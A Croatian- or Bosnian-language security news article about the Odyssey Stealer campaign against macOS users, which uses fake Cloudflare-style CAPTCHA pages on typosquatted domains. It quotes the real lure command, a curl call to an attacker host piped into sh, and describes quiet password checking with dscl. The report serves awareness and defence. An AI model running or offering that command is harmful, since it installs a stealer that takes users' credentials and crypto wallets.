Pojavila se sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a, koja koristi obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleSkripti osmišljenih za prikupljanje osjetljivih korisničkih akreditiva i financijskih podataka.
Kampanja se koristi domenama koje se nepravilno pišu, a koje vjerno oponašaju legitimne financijske platforme i web-stranice Apple App Store-a, stvarajući uvjerljivu fasadu koja zavara korisnike da izvršavaju opasne naredbe na svojim sistemima.
Napad započinje kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne upite za CAPTCHA u stilu Cloudflare-a.
Ove navodno legitimne stranice za verifikaciju upućuju korisnike macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalne aplikacije kako bi dokazali da nisu roboti.
Jednom kada se izvrše, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja akreditive preglednika, kriptovalutne novčanike i osjetljive osobne informacije pohranjene u više aplikacija.
Istraživači Cyfirme identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, redizajniranu verziju prethodno poznatog Poseidon Stealer-a, koji je sam potekao kao fork AMOS Stealer-a.
Istraživački tim otkrio je više upravljačkih i nadzornih panela povezanih s ovom aktivnošću, s infrastrukturom koja je uglavnom hostovana u Rusiji.
Zlonamjerni softver pokazuje jasnu sklonost ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Državama i Europskoj uniji, dok istovremeno upadljivo izbjegava žrtve u zemljama Zajednice neovisnih država.
Odyssey Stealer predstavlja zabrinjavajući evolucijski korak u zlonamjernom softveru usmjerenom na macOS, kombinirajući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima.
Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznato izgledajuće sigurnosne upite koji se čine rutinskim postupcima provjere.
Napadaci su pažljivo izradili svoje distribucijske web-stranice kako bi oponašali pouzdane platforme, čineći otkrivanje posebno izazovnim za nesuđene korisnike.
Mehanizam infekcije zlonamjernog softvera oslanja se na višestupanjski proces koji započinje typosquattingom domena i kulminira potpunim ugrožavanjem sistema.
Kada korisnici posjete zlonamjerne domene, nailaze na profesionalno dizajnirane stranice koje repliciraju izgled legitimnih sistema za verifikaciju CAPTCHA.
Lažni upit prikazuje upute za korisnike macOS-a za izvršavanje naredbe koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`.
Ova naredba dohvaća i izvršava AppleSkript sa servera za upravljanje i nadzor napadača. Skript koristi alfanumeričko skrivanje radi sakrivanja naziva funkcija, iako analiza otkriva njegovu pravu svrhu.
Nakon izvršavanja, zlonamjerni softver stvara strukturu privremenog direktorija pomoću naredbe `mkdir`, specifično uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu.
AppleSkript zatim prikazuje uvjerljiv upit za autentifikaciju osmišljen za hvatanje korisnikove sistemske lozinke.
Kako bi tiho potvrdio ukradene akreditive, koristi macOS `dscl` naredbu s parametrom `authonly`, osiguravajući da proces verifikacije ostane skriven od korisnika.
Ova tehnika omogućava zlonamjernom softveru da potvrdi valjanost lozinke bez aktiviranja sistemskih upozorenja ili sumnji korisnika, pokazujući duboko razumijevanje napadača o sigurnosnim mehanizmima macOS-a.
Sigurnosna firma Cyfirma je objavila ovo upozorenje na svom zvaničnom blogu, naglašavajući rastuću prijetnju zlonamjernog softvera usmjerenog na macOS korisnike. Metodologija napada je značajna jer ne iskorištava tehničke ranjivosti, već se oslanja na socijalni inženjering kako bi prevarila korisnike. Prevaranti stvaraju lažne web-stranice koje izgledaju poput legitimnih stranica za provjeru autentičnosti, poput Cloudflare CAPTCHA testova, kako bi uvjerili korisnike da izvrše zlonamjerne naredbe. Ove naredbe, koje se često nalaze u Base64 kodiranom obliku, kada se kopiraju i lijepe u terminal, pokreću preuzimanje i izvršavanje zlonamjernog AppleSkripta. Ovaj skript zatim tiho prikuplja osjetljive podatke, uključujući akreditive za prijavu, podatke o kriptovalutnim novčanicima i druge lične podatke, bez izazivanja sumnje kod korisnika. Konkretni primjer ovog napada je kampanja koja koristi domene koje se nepravilno pišu, oponašajući popularne financijske platforme i Appleov App Store, čineći prevaru uvjerljivom. Cilj je izvući podatke i potencijalno financijske dobiti.
